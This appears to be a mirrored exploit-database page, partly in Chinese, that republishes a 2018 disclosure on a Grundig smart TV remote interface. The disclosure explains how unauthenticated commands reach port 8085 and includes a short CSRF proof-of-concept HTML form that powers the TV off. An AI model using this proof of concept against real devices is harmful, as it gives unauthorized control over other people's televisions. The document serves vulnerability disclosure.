Grundig Smart Inter@ctive 3.0 Insecure Direct Object Reference - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1216025 漏洞类型
发布时间 2018-07-09 更新时间 2018-07-09
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018070102
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: Grundig Smart Remote App CSRF
# Google Dork: Local Vulnerability
# Date: 06.07.2018
# Exploit Author: Ahmethan GALTEKAdegN ~ @inject0r16
# Vendor Homepage: https://www.grundig.com/
# Software Link: https://play.google.com/store/apps/details?id=arcelik.
android.grundig.remote
# Version: Grundig Smart Inter@ctive 3.0
# Tested on: Windows 7-8-10
# CVE : none

Hello! I'm trying my TV.I saw a Grundig remote control application on
Google Play.
Computer I downloaded and decompiled APK. And I began to examine individual
classes.
I noticed in a class that a request was sent during operations on the
command line.
I downloaded the phone packet viewer and opened the control application and
made some operations.
And I saw that there was such a request;

GET /sendrcpackage?keyid=-2547&keysymbol=-4078 HTTP/1.1

I noticed that each process has an id value. Then I turned off the
television using the control application and noted the outgoing IDs.
The only requirement for the connection between the TV and the application
was to have the same IP address.
After I made the IP address on the TV and the phone and the IP address on
the computer the same: I accessed the interface from the 8085 port.
Now I could do anything from the computer :)

CSRF POC :

<html>
<head>
<title>Grundig TV PoC</title>
</head>
<body>
<h1>Grundig Inter@ctive 3 Shutdown PoC</h1>
<form method="POST" action="http://TargetIP:8085/sendrcpackage?keyid=-2544&
keysymbol=-4081
<http://targetip:8085/sendrcpackage?keyid=-2544&keysymbol=-4081>">
<input type="submit" value="Go!">
</form>
</body>
</html>

this poc will turn off the television when it is running. :)

video about vulnerability;
https://youtu.be/H7WYTkgtwsY


#MoreThanYouImagine! ~ ahmeth4n.org

greetz : @SmashTheKernel , @t3beq , @c_c0re